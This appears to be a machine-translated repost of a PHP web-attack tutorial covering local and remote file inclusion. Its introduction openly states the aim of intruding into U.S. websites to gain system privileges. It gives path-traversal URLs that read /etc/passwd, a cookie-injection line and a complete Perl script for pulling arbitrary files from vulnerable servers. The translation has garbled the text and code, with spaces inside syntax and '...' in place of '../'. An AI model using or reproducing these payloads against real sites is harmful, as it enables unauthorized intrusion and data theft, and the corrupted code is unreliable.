Php vulnerability access

 

| = ---------- [Web vulnerabilities have the opportunity to obtain system permissions] -------------- = |

 

-- [Directory

1-Introduction

2-local and remote file inclusion (LFI/RFI)

2.1-Introduction

2.2-Remote Command Execution

2.2.1-inject php code into apache logs

2.2.2-insert php code into the table

2.2.3-inject php code to insert an image

2.2.4-inject php code into the session file

2.2.5-inject php code to insert other files

2.3-get a webshell

2.4-Remote File Inclusion

3-blind Injection

3.1-Introduction

3.2-load local files

3.3-Brute Force Data Acquisition

3.4-Remote Command Execution

3.5-get a webshell

 

4-Reference

Bytes --------------------------------------------------------------------------------------------------------

--- [1-Introduction

 

In the United States, many websites are vulnerable to attacks. Most of them are code that has been used for a long time and have many vulnerabilities. We can use LFI, RFI, SQL, XSS, SSI, ICH and other attack methods to intrude into them. In this way, we will attack these U.S. websites to obtain SYSTEM privileges and remotely execute commands.

 

This will be a boring article about some types of vulnerabilities, just to let you know, I will try my best to contribute to some new things, and record some basic concepts of vulnerabilities.

 

--- [2-local and remote file inclusion (LFI/RFI)

 

---- [2.1-Introduction

 

This type of attack is well known, and is basically caused by the use of the require, require_once, include, or include_once command to call another web page while the variables are not initialized. Example:

Require ($ file );

Require ("regiondes/". $ file );

Require ("ages/". $ lang. ". php ");

Require ("themes/". $ tema. "/config. php ");

The exploitation of this vulnerability is well known. I don't need to explain it in detail. I just want to give some examples. For example:

 

Include type:

Require ($ file );

Usage:

Http: // host /? File =/etc/passwd

Include type:

Require ("regiondes/". $ file );

Usage:

Http: // host /? File =.../etc/passwd

Include type:

Require ("ages/". $ lang. ". php ");

Require ("themes/". $ theme. "/config. php ");

Usage:

Http: // host /? File =.../etc/passwd % 00

Include type:

Require ("ages/". $ _ COOKIE ['lang ']. ". php

Usage:

Javascript: document. cookie = "lan =.../../etc/passwd % 00 ";

 

A pl script can exploit this vulnerability type to intrude through get or post.

 

Lfi. pl

#! /Usr/bin/perl

 

# Perl script to exploit LFI based in GET and POST requests

# Example: http://site.com/index.php? Var =

# URL: http://site.com/index.php

# Variable: var

# Method: POST

#

# By Pepelux (pepelux [at] enye-sec [dot] org)

 

Use LWP: UserAgent;

$ Ua = LWP: UserAgent-> new;

 

My ($ host, $ var, $ method) = @ ARGV;

 

Unless ($ ARGV [2]) {

Print "Usage: perl $0 <url> <vulnerable_var> <method> \ n ";

Print "\ tex: perl $0 http://site.com/index.php var GET \ n ";

Print "\ tex: perl $0 http://site.com/index.php var POST \ n ";

Exit 1;

}

 

$ Ua-> agent ("Mozilla/5.0 (X11; U; Linux i686; en-US; rv: 1.9.0.1 )");

$ Ua-> timeout (10 );

$ Host = "http: //". $ host if ($ host !~ /^ Http :/);

 

While (){

Print "file to edit :";

Chomp ($ file = <STDIN> );

 

If ($ method = ~ /GET /){

$ Url = $ host ."? ". $ Var." =.../". $ file." % 00 ";

$ Req = HTTP: Request-> new (GET => $ url );

$ Req-> header ('accept' => 'text/html ');

}

Else {

$ Req = HTTP: Request-> new (POST => $ host );

$ Req-> content_type ('application/x-www-form-urlencoded ');

$ Req-> content ($ var. "=.../". $ file. "% 00 ");

}

 

$ Res = $ ua-> request ($ req );

 

If ($ res-> is_success ){

$ Result = $ res-> content;

Print $ result;

}

Else {print "Error \ n ";}

 

}

 

From: Tattoo blog